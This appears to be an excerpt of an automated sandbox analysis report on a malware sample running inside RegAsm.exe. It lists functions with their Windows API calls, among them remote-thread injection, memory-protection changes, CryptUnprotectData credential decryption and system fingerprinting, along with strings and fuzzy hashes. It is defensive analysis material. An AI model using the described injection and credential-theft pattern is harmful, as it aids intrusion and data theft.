Opcode Fuzzy Hash: f9aab0012291b227a3ebab8fbea929948215f312e6438fba150346a0e375257f
Instruction Fuzzy Hash: 5B31F3B5900249EFCB10CFAAD984ADEBFF5FB48314F208429E958A7350D375A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013526B8 Relevance: 1.6, APIs: 1, Instructions: 66
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,?,?,?,00000000,?,?), ref: 01352754

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: 2642f4ce1fe34fe2462442299b2517088ea33133da2506ecc9f4320dc82753f0
Instruction ID: 72881cd02431b8d0f1d99053f5cfc5e67b1e932ffe063cea3438c0caac0f4f95
Opcode Fuzzy Hash: 2642f4ce1fe34fe2462442299b2517088ea33133da2506ecc9f4320dc82753f0
Instruction Fuzzy Hash: 0D21F2B5900249DFCB10CF9AD984ADEBFF5FB48314F20802AE958A7350D375A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013525E8 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 01352669

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1a3e3f864a250d454de62314211a5eed3b5ec5e66b6c46d061ef65dd4ae2f8f9
Instruction ID: bc37420810b4a590007d65525760430d96356d769da42a7a4cf174876f5fe286
Opcode Fuzzy Hash: 1a3e3f864a250d454de62314211a5eed3b5ec5e66b6c46d061ef65dd4ae2f8f9
Instruction Fuzzy Hash: DA2115B5D01219DFCB00CF9AD884ADEFBF4FB48324F10812AE918A7250D374A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 013525F0 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 01352669

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e14fdc16230c1f316e8f805a089279a2061a6acfe6df809d4864485ba4abc98e
Instruction ID: a886a6db7c122cfebaaf5bd32b8a10d79ee5943522fbc6dabe0a055d5cb1f107
Opcode Fuzzy Hash: e14fdc16230c1f316e8f805a089279a2061a6acfe6df809d4864485ba4abc98e
Instruction Fuzzy Hash: 4821F7B5D01619DFCB00CF9AD884BDEFBB4FB08324F10812AE958A7250D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0135099F Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01350A79
4'^q, xrefs: 01350A4E

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 278f9c72d1de79bf86c1136f8be766def05f0e48a9c1a96d03f3fa60075ed373
Instruction ID: fb46785933c2db6848b7e699a7ef90835157aff4066e0339a7b4c650e69aeb42
Opcode Fuzzy Hash: 278f9c72d1de79bf86c1136f8be766def05f0e48a9c1a96d03f3fa60075ed373
Instruction Fuzzy Hash: 40613C75E012498FDB0DEF7AE5A46AABBF3BBC8704B04C53AC0159B279EB3059458B50

Uniqueness

Uniqueness Score: -1.00%

Function 013509B0 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01350A79
4'^q, xrefs: 01350A4E

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: d08f473082269d2ea32a82c37f0b1d98b87333a9af4c1fc24682cf803e0dbdce
Instruction ID: 8e70557c55463e3fa20f753d515ab716c00fb96c41cb02bc010089c4b0761c2d
Opcode Fuzzy Hash: d08f473082269d2ea32a82c37f0b1d98b87333a9af4c1fc24682cf803e0dbdce
Instruction Fuzzy Hash: 8C513D75E012498FD70DEF7AF5A46AABBE3BBC8704B04C53AC0159B27DEB7058458B50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 5064, Parent PID: 3104COMMON

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.6%
Total number of Nodes:	332
Total number of Limit Nodes:	9

Executed Functions

Function 00431351 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 00431411
GetSystemMetrics.USER32 ref: 00431425
DeleteObject.GDI32 ref: 00431490
SelectObject.GDI32 ref: 004314EA
SelectObject.GDI32 ref: 00431581
DeleteObject.GDI32 ref: 004315BE

Strings

, xrefs: 0043154E

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: 691b7d514adee591cacd2b6452866ac4419c25b9f8a3e10291f5471fc496d812
Instruction ID: 67079c5f86227982a02381edd9ac7fdc7292864666a4ed8df9fb31f7709852f4
Opcode Fuzzy Hash: 691b7d514adee591cacd2b6452866ac4419c25b9f8a3e10291f5471fc496d812
Instruction Fuzzy Hash: 05A179B8615B008FC364DF28DA81A26BBF1FB89704F10892DE99AC7760D731B844CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00426F56 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 784
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00427397
GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042745F

Strings

5%3a, xrefs: 0042708D
1>7m, xrefs: 00427474
#<<=, xrefs: 0042746D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: #<<=$1>7m$5%3a
API String ID: 3545744682-978947328
Opcode ID: ffda659fe353622b65c3065e91eca5e76bc3c783de20034893eeeffa236d7786
Instruction ID: 4840ba83f734b07a3efb88ac3f1f8780be15207435e2c54e08de7f68cb07a5a6
Opcode Fuzzy Hash: ffda659fe353622b65c3065e91eca5e76bc3c783de20034893eeeffa236d7786
Instruction Fuzzy Hash: 665280746087518FE325CF29D4A0B63FBF1BF56304F18898DD4A64B792C379A849CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00426F60 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5%3a, xrefs: 0042708D
1>7m, xrefs: 00427474
#<<=, xrefs: 0042746D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #<<=$1>7m$5%3a
API String ID: 0-978947328
Opcode ID: 3921f22d9d6f9f23462bd113fbb54a07129ddc97ffab8ca48aa4df55c490d473
Instruction ID: 1483c238aabb6140e11ce7634a9120d89440c1a795628e08aacb685211fbcea0
Opcode Fuzzy Hash: 3921f22d9d6f9f23462bd113fbb54a07129ddc97ffab8ca48aa4df55c490d473
Instruction Fuzzy Hash: A3328FB46047518FE325CF28D4A0B63BBF1BF56304F58898DD4D68B792C379A849CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7C0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1mo, xrefs: 0041DC37
je, xrefs: 0041DC4B

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 1mo$je
API String ID: 0-2621821245
Opcode ID: 13c4ee59d8c7ff2c9d63a5c3147634bc1c71a929b8dae550ec4342bc18a80646
Instruction ID: ad5ec915953cd9f6dcd08d213f5934235947e1a21a999f1345d0680f030ef226
Opcode Fuzzy Hash: 13c4ee59d8c7ff2c9d63a5c3147634bc1c71a929b8dae550ec4342bc18a80646
Instruction Fuzzy Hash: 36E16AB4604701CFE328CF15C890B67B7E2FF8A308F15892DE9964B794C775A846CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00427878 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 454COMMON

Download Yara Rule

Strings

48f9, xrefs: 00427FA7

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 48f9
API String ID: 0-416760043
Opcode ID: e449ef69655730c0e43537e721d5bb95c841fece5d3fe436d04c8c79227e7e50
Instruction ID: ff69c65a2c485a5a2613888f6e2ec7a426f506306f037e042c11363a70a59b66
Opcode Fuzzy Hash: e449ef69655730c0e43537e721d5bb95c841fece5d3fe436d04c8c79227e7e50
Instruction Fuzzy Hash: BCE17E742087518BD725CF29C0A0723FBF1BF56304F588A9DD4E68B796C339A819CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00427C5C Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 385COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427D7A

Strings

48f9, xrefs: 00427FA7

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 48f9
API String ID: 3960555810-416760043
Opcode ID: 6205a7a472e23bca44ae3847a876b3258d526fc1b884f8ab28ffe2d88a817bb2
Instruction ID: 38129933558acd69868a44194bbc5c9454c3df14a0da8cff28849fe02bb8b21d
Opcode Fuzzy Hash: 6205a7a472e23bca44ae3847a876b3258d526fc1b884f8ab28ffe2d88a817bb2
Instruction Fuzzy Hash: 57C18F742087518BD725CF29C0A0723BBF1BF56304F588A9DD4A64B796C339E809CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0043B430 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E37C,005C003F,00000006,00120089,?,00000018,gxyz,00000000,00414FAA), ref: 0043B456

Strings

gxyz, xrefs: 0043B444

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: gxyz
API String ID: 2994545307-2474275795
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Uniqueness

Uniqueness Score: -1.00%

Function 0043EC50 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043ECB8
eB, xrefs: 0043EE03, 0043EED1, 0043EF36, 0043EE3D, 0043EE30

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: eB$gxyz
API String ID: 0-1477549594
Opcode ID: 175bf4ba07e40e29d38ae9a7c813607c3e6c9292006a0a12a0d07d03ddc57382
Instruction ID: c06419ba4dc142a014a8a64bb3c61da883b9d08065cc754ae75e75617447e272
Opcode Fuzzy Hash: 175bf4ba07e40e29d38ae9a7c813607c3e6c9292006a0a12a0d07d03ddc57382
Instruction Fuzzy Hash: 4091AE71A093029BD718CF1AC490B6BB7E2FF89704F14992DE8855B391D774ED14CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00416975 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

"-, xrefs: 00416A2E

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "-
API String ID: 0-2746484906
Opcode ID: 813fbaf73c9f0b57f04557624938d38aadc0086499c4940796f5ad43d80acbd7
Instruction ID: 68152acc607ff46f881859acb176ecfa4ff8b7d7b890d642ce79de6afd4ff3b2
Opcode Fuzzy Hash: 813fbaf73c9f0b57f04557624938d38aadc0086499c4940796f5ad43d80acbd7
Instruction Fuzzy Hash: 15C145B19187808BD714CF24D89179BBBF2BFC5304F148A1DF4A55B2A1D778C94ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 004168A5 Relevance: 1.5, APIs: 1, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0041691F

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: b37bb528bfd7c2bf4684fe0d8f3f270884cf002d482c98af26727fc5f0aff099
Instruction ID: be3052493f6c3866db20e7f87a14bafe5450ceda9ef13c7f76c6bf00dcbe6b0a
Opcode Fuzzy Hash: b37bb528bfd7c2bf4684fe0d8f3f270884cf002d482c98af26727fc5f0aff099
Instruction Fuzzy Hash: FBF08CF4845240AFF734DF21EC42FAAB6A0EF95309F50442CE14C91293E779251A8B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0043E6B0 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

gxyz, xrefs: 0043E718

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: 191c7801697598e5dec02e5ebf312e5ae2e0317988eb48646939fbba8ff53d3b
Instruction ID: 20853713d2b7b7b9e66d5ce5f9fe71bc661fe7a278c7b9b9db36ddcb752e2111
Opcode Fuzzy Hash: 191c7801697598e5dec02e5ebf312e5ae2e0317988eb48646939fbba8ff53d3b
Instruction Fuzzy Hash: B051AF756093019BE718CF16C850B6FBBE2EBC9718F14892EE495973D1C339E905CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00421ADB Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208f7a3449cb26f89aaaf37589a270f76a27a940a805f92c2731084d8c8882f0
Instruction ID: 6e33d88ac389fb48c6d363afc0ed7caba437404ff15d8fea8e9ad9ea5ff5fd50
Opcode Fuzzy Hash: 208f7a3449cb26f89aaaf37589a270f76a27a940a805f92c2731084d8c8882f0
Instruction Fuzzy Hash: 9A5146B0901B009FD3208F29D559B13BBE1EB85324F258A8DD8994B7A5D379E406CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00414D20 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b071a37ea379c87ac55a346247fa46c1990fddb95edfbb9c11c694ef7abd4e
Instruction ID: 14b593150811a33af6181a4e0f844ff3ad5dcf19d78ebbbf1a4fa5a217db6be4
Opcode Fuzzy Hash: 20b071a37ea379c87ac55a346247fa46c1990fddb95edfbb9c11c694ef7abd4e
Instruction Fuzzy Hash: 624169B59083048BC7219F54D8807B7B7E4EFE6314F09462AE89987381EB78DC84C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0042F5FF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ba2c83b99315f020b361f1bbe86d87d972063eabb4828f65930f03e23c1a9f
Instruction ID: a5a514b2dc12c0c4a106640cda517e1665125fe103319de91abfc6e8b00f839c
Opcode Fuzzy Hash: 94ba2c83b99315f020b361f1bbe86d87d972063eabb4828f65930f03e23c1a9f
Instruction Fuzzy Hash: 21F0B8B5108700CFE310CF30C60430BBBE2BB84348F25CA2CD89A47610C7B8B0498F84

Uniqueness

Uniqueness Score: -1.00%

Function 0042B350 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0042B426

Strings

8, xrefs: 0042B3A2
S, xrefs: 0042B372
0, xrefs: 0042B37A
Q, xrefs: 0042B36A
C, xrefs: 0042B39A
E, xrefs: 0042B38A
:, xrefs: 0042B382
b, xrefs: 0042B3AA
m, xrefs: 0042B3B6
A, xrefs: 0042B392

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: 0$8$:$A$C$E$Q$S$b$m
API String ID: 2525500382-2170652405
Opcode ID: d46e7bc60be77f868a06b396fcf15e1fe4f9225c0b03f9c6019aaa06e3d0b005
Instruction ID: e7d808b5a025ce23e8fce878e7665712146a06aaafb69b2f2ef5deae42d205ac
Opcode Fuzzy Hash: d46e7bc60be77f868a06b396fcf15e1fe4f9225c0b03f9c6019aaa06e3d0b005
Instruction Fuzzy Hash: 6C41D7701087818FD725CF28C498742BFE1AB56314F198A9CD8E94F39AC3B5E549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041DC00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041DCFD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041DD2A

Strings

1mo, xrefs: 0041DC37
je, xrefs: 0041DC4B

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 1mo$je
API String ID: 237503144-2621821245
Opcode ID: 1d18a14ef8f128250eed525e451d3ae39f6907b5ef34198c55db770da6220c6e
Instruction ID: b0dd97f1ba71db9db88fbde3e315cc0591db31ab5e8bd6c1da36c4f469850c58
Opcode Fuzzy Hash: 1d18a14ef8f128250eed525e451d3ae39f6907b5ef34198c55db770da6220c6e
Instruction Fuzzy Hash: F6717CB06083518FE324CF14C8A1BABBBE5EFC6718F014A1DE8D65B381D7789945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0043AE83 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D1B7, xrefs: 0043AD77
D1B7, xrefs: 0043AEDF

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: D1B7$D1B7
API String ID: 0-2576811906
Opcode ID: 998b37ee8bd525d23d90a996edacb16ffb0ea15be8d674a11205fbd27d781e0d
Instruction ID: 95b941229dbe18942ec21b8ccdee2464045a1687475e5fad6880434798cc208e
Opcode Fuzzy Hash: 998b37ee8bd525d23d90a996edacb16ffb0ea15be8d674a11205fbd27d781e0d
Instruction Fuzzy Hash: 6D419EB4D047018BDB148F11ECA06267BA2FB4A305B08C46DD89A4BB6AE738D560CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00408EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00408F10

Strings

of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDA

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
API String ID: 621844428-2804141084
Opcode ID: be98104982ad34049c9a48491e0082f2cfe17b4536b674b9c51427a4776eb462
Instruction ID: e0def76aebe0f00c2bed09759bfb27ca0b57c4a04570c446274de05c392929ac
Opcode Fuzzy Hash: be98104982ad34049c9a48491e0082f2cfe17b4536b674b9c51427a4776eb462
Instruction Fuzzy Hash: 81F0583040C2028EC7107B71C30226A7BA5BF56309F10483FEAC6B12D2DE7C9002AA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00437458 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437495

Strings

C, xrefs: 00437458
\, xrefs: 00437460

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: InformationVolume
String ID: C$\
API String ID: 2039140958-514332402
Opcode ID: a41cfeb18d9182f307edaab4131461026c84ccbea5f949aa80bbf8a0e872d17b
Instruction ID: 3afc80ecb56b786e859913d655f9be005fa4f2a335d0bd2329f2d5c22028f87a
Opcode Fuzzy Hash: a41cfeb18d9182f307edaab4131461026c84ccbea5f949aa80bbf8a0e872d17b
Instruction Fuzzy Hash: 54F092B9684301BBE328CF20EC5BF1A36949741745F20483CB246E61E0D7F4A5188A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043B0AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 0043B1E1

Strings

"vF, xrefs: 0043B1EC

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: "vF
API String ID: 1029625771-575828297
Opcode ID: 9a4166681d8ace58ab8cd70659512a8e38d7c160e559c32d2148940e20361f8b
Instruction ID: fdab40fe981f47035e4e378d7da2f291c2345f0fdff76f6e77c7cd1f00c7a945
Opcode Fuzzy Hash: 9a4166681d8ace58ab8cd70659512a8e38d7c160e559c32d2148940e20361f8b
Instruction Fuzzy Hash: F631BFB4100A02ABE725CF16C4A5723BBB1FF49344F208A1CC4A94BA65D738B5A5CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 0043AB4A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 0043ACA4

Strings

uvw, xrefs: 0043AC2D

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: uvw
API String ID: 1029625771-3462500642
Opcode ID: 8dcdb3237b8ff09e67bb33a13ee8859e5a134d7b0689bf3d34e9b59eafb9200c
Instruction ID: 538177c5919d20622e53dab2b6d8f46397e7618ab3344265278ea479b2ef01f2
Opcode Fuzzy Hash: 8dcdb3237b8ff09e67bb33a13ee8859e5a134d7b0689bf3d34e9b59eafb9200c
Instruction Fuzzy Hash: 3C415BB41017028BDB18CF15C8E07137BA2EF4A325F19899CD89A4F75AD738E495CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0043AD16 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 0043ADDE

Strings

D1B7, xrefs: 0043AD77

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: D1B7
API String ID: 1029625771-1785272153
Opcode ID: 6bb097730bd1bba9526a77450319e364137c5c5994d77f73bbec442f59f511b2
Instruction ID: a59ba08d533fb95967725b08a339e0c6914e05d18c395201ec583e4e6ce2f63c
Opcode Fuzzy Hash: 6bb097730bd1bba9526a77450319e364137c5c5994d77f73bbec442f59f511b2
Instruction Fuzzy Hash: 5F2190B49047018FDB18CF11EC916267BA2FB46306B04C46DD8960BB6AE734D461CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043B2DD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 0043B378

Strings

f98;, xrefs: 0043B338

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: f98;
API String ID: 1279760036-2988964867
Opcode ID: c3ae634c2f3db557e1aaf7fc2517be84f747cf420c6057c49819a3f99a55675a
Instruction ID: c418ce8b1bfb313a4ef5b188028fbcbb4899e3f20e66c6a17b539da9dfa517b0
Opcode Fuzzy Hash: c3ae634c2f3db557e1aaf7fc2517be84f747cf420c6057c49819a3f99a55675a
Instruction Fuzzy Hash: A61103715083519FE310CF14D99475FBBA2EBC4728F148A1DE8E81B245C379D9498BD6

Uniqueness

Uniqueness Score: -1.00%

Function 00415360 Relevance: 3.1, APIs: 2, Instructions: 146COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041539D
